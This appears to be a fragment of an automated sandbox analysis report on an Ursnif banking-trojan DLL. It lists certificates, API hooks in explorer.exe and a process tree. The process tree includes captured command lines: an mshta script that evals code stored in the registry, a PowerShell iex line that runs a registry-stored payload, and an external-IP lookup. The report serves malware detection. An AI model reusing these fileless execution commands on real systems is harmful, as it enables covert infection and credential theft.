                                                                                                                                                                                                  Nov 25, 2020 19:06:26.357816935 CET151.101.1.44443192.168.2.749748CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USWed Nov 25 01:00:00 CET 2020 Thu Sep 24 02:00:00 CEST 2020Mon Dec 27 00:59:59 CET 2021 Tue Sep 24 01:59:59 CEST 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=USCN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 24 02:00:00 CEST 2020Tue Sep 24 01:59:59 CEST 2030
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.367996931 CET87.248.118.23443192.168.2.749744CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USSun Nov 15 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Wed Dec 30 00:59:59 CET 2020 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                  Nov 25, 2020 19:06:26.369107008 CET87.248.118.23443192.168.2.749745CN=*.yahoo.com, O=Oath Inc, L=Sunnyvale, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USSun Nov 15 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Wed Dec 30 00:59:59 CET 2020 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,09e10692f1b7f78228b2d4e424db3a98c
                                                                                                                                                                                                  CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                                                                  Nov 25, 2020 19:08:13.278081894 CET162.0.213.229443192.168.2.749776CN=*, OU=1, O=1, L=1, ST=1, C=XXCN=*, OU=1, O=1, L=1, ST=1, C=XXWed Nov 18 11:57:57 CET 2020Sat Nov 16 11:57:57 CET 2030771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,10-11-13-35-23-24-65281,29-23-24,07dd50e112cd23734a310b90f6f44a7cd

                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                  User Modules

                                                                                                                                                                                                  Hook Summary

                                                                                                                                                                                                  Function NameHook TypeActive in Processes
                                                                                                                                                                                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                                                                                                                                                                                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                                                                                                                                                                                                  CreateProcessAsUserWEATexplorer.exe
                                                                                                                                                                                                  CreateProcessAsUserWINLINEexplorer.exe
                                                                                                                                                                                                  CreateProcessWEATexplorer.exe
                                                                                                                                                                                                  CreateProcessWINLINEexplorer.exe
                                                                                                                                                                                                  CreateProcessAEATexplorer.exe
                                                                                                                                                                                                  CreateProcessAINLINEexplorer.exe

                                                                                                                                                                                                  Processes

                                                                                                                                                                                                  Process: explorer.exe, Module: WININET.dll
                                                                                                                                                                                                  Function NameHook TypeNew Data
                                                                                                                                                                                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFFAC2D5200
                                                                                                                                                                                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT5BB571C
                                                                                                                                                                                                  Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                  Function NameHook TypeNew Data
                                                                                                                                                                                                  CreateProcessAsUserWEAT7FFFAC2D521C
                                                                                                                                                                                                  CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                                                                  CreateProcessWEAT7FFFAC2D5200
                                                                                                                                                                                                  CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                                                                  CreateProcessAEAT7FFFAC2D520E
                                                                                                                                                                                                  CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                                                                                                                                                                  Process: explorer.exe, Module: user32.dll
                                                                                                                                                                                                  Function NameHook TypeNew Data
                                                                                                                                                                                                  api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFFAC2D5200
                                                                                                                                                                                                  api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT5BB571C

                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:15
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:loaddll32.exe 'C:\Users\user\Desktop\vnaSKDMnLG.dll'
                                                                                                                                                                                                  Imagebase:0x8a0000
                                                                                                                                                                                                  File size:119808 bytes
                                                                                                                                                                                                  MD5 hash:76E2251D0E9772B9DA90208AD741A205
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:16
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\vnaSKDMnLG.dll
                                                                                                                                                                                                  Imagebase:0x340000
                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261787991.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261868993.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261831474.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261898772.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261995232.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.365991031.000000000532C000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.423867966.0000000002940000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261930125.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261629754.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.261360311.0000000005528000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000002.482163983.0000000002910000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:16
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                  Imagebase:0x870000
                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:16
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Imagebase:0x7ff6399a0000
                                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:17
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:21
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:82952 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:06:45
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17434 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:07
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17438 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:10
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17446 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:14
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5804 CREDAT:17456 /prefetch:2
                                                                                                                                                                                                  Imagebase:0x8b0000
                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:20
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
                                                                                                                                                                                                  Imagebase:0x7ff6ae9a0000
                                                                                                                                                                                                  File size:14848 bytes
                                                                                                                                                                                                  MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:21
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
                                                                                                                                                                                                  Imagebase:0x7ff6ef390000
                                                                                                                                                                                                  File size:447488 bytes
                                                                                                                                                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000016.00000003.416910277.0000020EA8E70000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:22
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:28
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\q3xypckz\q3xypckz.cmdline'
                                                                                                                                                                                                  Imagebase:0x7ff601910000
                                                                                                                                                                                                  File size:2739304 bytes
                                                                                                                                                                                                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:30
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESBA2B.tmp' 'c:\Users\user\AppData\Local\Temp\q3xypckz\CSC358FCCDF4025435CA355D903053645.TMP'
                                                                                                                                                                                                  Imagebase:0x7ff7c4700000
                                                                                                                                                                                                  File size:47280 bytes
                                                                                                                                                                                                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:32
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\chv50z53\chv50z53.cmdline'
                                                                                                                                                                                                  Imagebase:0x7ff601910000
                                                                                                                                                                                                  File size:2739304 bytes
                                                                                                                                                                                                  MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:33
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RESC8D1.tmp' 'c:\Users\user\AppData\Local\Temp\chv50z53\CSCD671F0735D74415BB6A373562E60C48B.TMP'
                                                                                                                                                                                                  Imagebase:0x7ff7c4700000
                                                                                                                                                                                                  File size:47280 bytes
                                                                                                                                                                                                  MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:38
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:
                                                                                                                                                                                                  Imagebase:0x7ff662bf0000
                                                                                                                                                                                                  File size:3933184 bytes
                                                                                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001E.00000003.441296482.0000000002FB0000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:41
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\control.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\control.exe -h
                                                                                                                                                                                                  Imagebase:0x7ff7172f0000
                                                                                                                                                                                                  File size:117760 bytes
                                                                                                                                                                                                  MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000002.446120837.00000000006D5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001F.00000003.432292653.000002090C820000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:49
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:
                                                                                                                                                                                                  Imagebase:0x7ff673460000
                                                                                                                                                                                                  File size:99272 bytes
                                                                                                                                                                                                  MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000020.00000002.519882408.0000026754D05000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:49
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                                                                                  Imagebase:0x7ff7fdc60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.446420368.0000024E31FF5000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.445169971.0000024E32160000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:51
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 728
                                                                                                                                                                                                  Imagebase:0xe20000
                                                                                                                                                                                                  File size:434592 bytes
                                                                                                                                                                                                  MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:52
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\4EC0.bi1'
                                                                                                                                                                                                  Imagebase:0x7ff7bf140000
                                                                                                                                                                                                  File size:273920 bytes
                                                                                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:52
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:
                                                                                                                                                                                                  Imagebase:0x7ff673460000
                                                                                                                                                                                                  File size:99272 bytes
                                                                                                                                                                                                  MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000026.00000002.515638073.0000024340635000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Start time:19:07:54
                                                                                                                                                                                                  Start date:25/11/2020
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff774ee0000
                                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                  Reset < >